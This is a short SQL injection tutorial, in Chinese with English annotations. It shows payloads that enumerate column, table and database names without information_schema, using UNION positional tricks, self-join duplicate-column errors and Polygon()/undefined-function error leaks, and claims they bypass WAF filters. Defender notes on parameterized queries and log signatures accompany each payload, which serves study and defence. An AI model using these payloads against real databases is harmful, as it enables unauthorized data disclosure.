遇到过因权限不足而无法访问 information_schema.columns、导致无法得知字段名的情况；后来在网上东找西找，找到了通过其他方式爆出字段名的方法。此方法也适用于绕过 WAF 对 information_schema 库等的过滤。
字段名
union
-- Column names of a UNION come from its first SELECT, so the constant row
-- (select 1)a,(select 2)b,(select 3)c,(select 4)d gives the derived table `e`
-- columns named 1..4; `e.4` then addresses the 4th column of `test` purely by
-- position, and `limit 1 offset 3` picks a single row -- no real column name
-- is needed anywhere. The trailing (select 1)g,(select 1)h,(select 1)i pad the
-- outer UNION to the same column count as `select * from test`.
-- Defender notes: this only works when the injected text reaches the engine as
-- SQL, so parameterized queries stop it outright; where information_schema
-- filtering is the control, the `(select 1)a,(select 2)b` derived-table shape is
-- a useful WAF / query-log signature for this bypass.
select * from test where id =1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from test)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
不使用union
-- `test as a join test as b` has no ON clause, so the inner derived table
-- carries every column of `test` twice; wrapping that in `select *` makes the
-- engine reject the duplicate column name, and that error text is what leaks
-- the first column name (per the author -- confirm the exact message on the
-- engine/version in use). No data is returned; the leak is entirely in the error.
-- Defender notes: the channel is a raw database error reaching the client.
-- Return a generic error to users, and log/alert on duplicate-column errors
-- raised by application accounts; parameterized queries prevent the injection
-- in the first place.
select name from test where id=1 and (select * from (select * from test as a join test as b) as c);
// 爆出第一个字段名后，使用 using 来爆第二个字段名
-- Same duplicate-column error as the plain self-join, but `using(id)` merges
-- the already-known column `id` into one, so the engine's complaint now names
-- the next duplicated column (the second column name, per the author).
-- Defender notes: identical mitigations -- never echo engine error text to
-- clients, alert on repeated duplicate-column errors from a single session,
-- and use parameterized queries so the payload is never parsed as SQL.
select name from test where id=1 and (select * from (select * from test as a join test as b using(id)) as c);
表名
// Polygon() 的参数不是 LineString 时会报错；如果传入的是已知字段名，报错信息会带出库名、表名和字段名
-- Polygon() expects LineString arguments; handing it the integer column `id`
-- makes the engine raise a type error, and per the author that error text
-- carries the database, table and column names when the argument is an
-- existing column. No rows are read -- this is pure error-based disclosure.
-- Defender notes: the control is to never return engine error text to the
-- client; in query/error logs, a geometry function such as Polygon() applied
-- to a non-spatial column by an application account is a clear indicator
-- worth alerting on.
select * from test where id=1 and Polygon(id);
库名
// 库中不存在 a 函数时，报错信息会指出此库无 a 函数，从而带出库名
-- `a()` is not a defined function, so the engine fails with an
-- undefined-function error that names the current database (per the author;
-- the exact message format, e.g. "FUNCTION <db>.a does not exist", should be
-- confirmed on the engine/version in use). Nothing is read from `test`; the
-- leak is entirely in the error text.
-- Defender notes: suppress engine errors to clients and alert on
-- undefined-function errors originating from application-layer queries --
-- a legitimate application does not call functions that do not exist.
select * from test where id=1-a();